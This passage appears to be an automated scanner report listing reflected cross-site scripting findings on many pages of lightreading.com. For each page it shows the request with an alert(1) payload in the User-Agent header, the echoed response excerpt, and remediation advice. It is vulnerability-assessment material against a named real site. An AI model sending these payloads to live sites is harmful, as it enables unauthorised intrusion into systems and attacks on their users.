Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:36 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 238959
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6781e"-alert(1)-"1eb6c2e8295"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae606"-alert(1)-"769d806f023 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cisco-solution-center.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae606"-alert(1)-"769d806f023
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:19:56 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 129773
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Cisco, Mobile Internet, Mobile Packet Core, IP RAN, Edge Networking, Core Networking, Con ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae606"-alert(1)-"769d806f023"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16307"-alert(1)-"509c6f419dc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16307"-alert(1)-"509c6f419dc
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:01:45 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 262285
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16307"-alert(1)-"509c6f419dc"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcacf"-alert(1)-"ca4c9346e83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp?doc_id=173549 HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bcacf"-alert(1)-"ca4c9346e83
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:13:38 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
X-Pingback: http://www.lightreading.com/xmlrpc.asp
Last-modified: Sat, 11 Dec 2010 23:13:37 GMT
Expires: Sun, 10 Apr 2011 19:13:37 GMT
Etag: s200805.p200805
Content-Length: 205142
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Cable/MSO equipment, Interactive advertising, Middleware & business support systems, TV, ...[SNIP]... terchange Format (EBIF) "; s.prop4="Enhanced TV Binary Interchange Format (EBIF) "; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bcacf"-alert(1)-"ca4c9346e83"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="20090313";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f63a0"-alert(1)-"cb34f8b9b35 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /email.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f63a0"-alert(1)-"cb34f8b9b35
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:01:53 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 266297
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f63a0"-alert(1)-"cb34f8b9b35"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57d2d"-alert(1)-"c9b49f01f41 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /europe HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57d2d"-alert(1)-"c9b49f01f41
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:13:18 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 241932
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)57d2d"-alert(1)-"c9b49f01f41"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 907a7"-alert(1)-"83bf0f856aa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /europe/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)907a7"-alert(1)-"83bf0f856aa
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:19:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 247300
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)907a7"-alert(1)-"83bf0f856aa"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0084"-alert(1)-"4f874a9f84e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c0084"-alert(1)-"4f874a9f84e
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:44 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 170460
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c0084"-alert(1)-"4f874a9f84e"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2788b"-alert(1)-"f988734ae27 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in-the-news/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2788b"-alert(1)-"f988734ae27
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:48 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sat, 11 Dec 2010 23:18:47 GMT
Expires: Sun, 10 Apr 2011 19:18:47 GMT
Etag: s200805.p200805
Content-Length: 185568
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2788b"-alert(1)-"f988734ae27"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17f2e"-alert(1)-"46e1dc72b00 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lg_redirect.asp?piddl_lgid_docid=200089 HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17f2e"-alert(1)-"46e1dc72b00
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:16:43 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 155981
Cache-control: private
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21978"-alert(1)-"f2a59b2c5d6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lg_redirect.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: 21978"-alert(1)-"f2a59b2c5d6
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:38 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 267252
Cache-control: private
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c88e5"-alert(1)-"ddd3f7200f3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /library.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c88e5"-alert(1)-"ddd3f7200f3
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:10 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 212829
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c88e5"-alert(1)-"ddd3f7200f3"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9aae"-alert(1)-"a88401eed5b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d9aae"-alert(1)-"a88401eed5b
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:11:53 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 176566
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d9aae"-alert(1)-"a88401eed5b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e7f0"-alert(1)-"49a4e60c5fa was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live/event_information.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e7f0"-alert(1)-"49a4e60c5fa
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:29 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 179587
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e7f0"-alert(1)-"49a4e60c5fa"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d17e"-alert(1)-"1db8511833b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6d17e"-alert(1)-"1db8511833b
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 175988
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6d17e"-alert(1)-"1db8511833b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96ac9"-alert(1)-"64c7fe1d8e9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-cable HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)96ac9"-alert(1)-"64c7fe1d8e9
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:12:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 241005
Cache-control: private
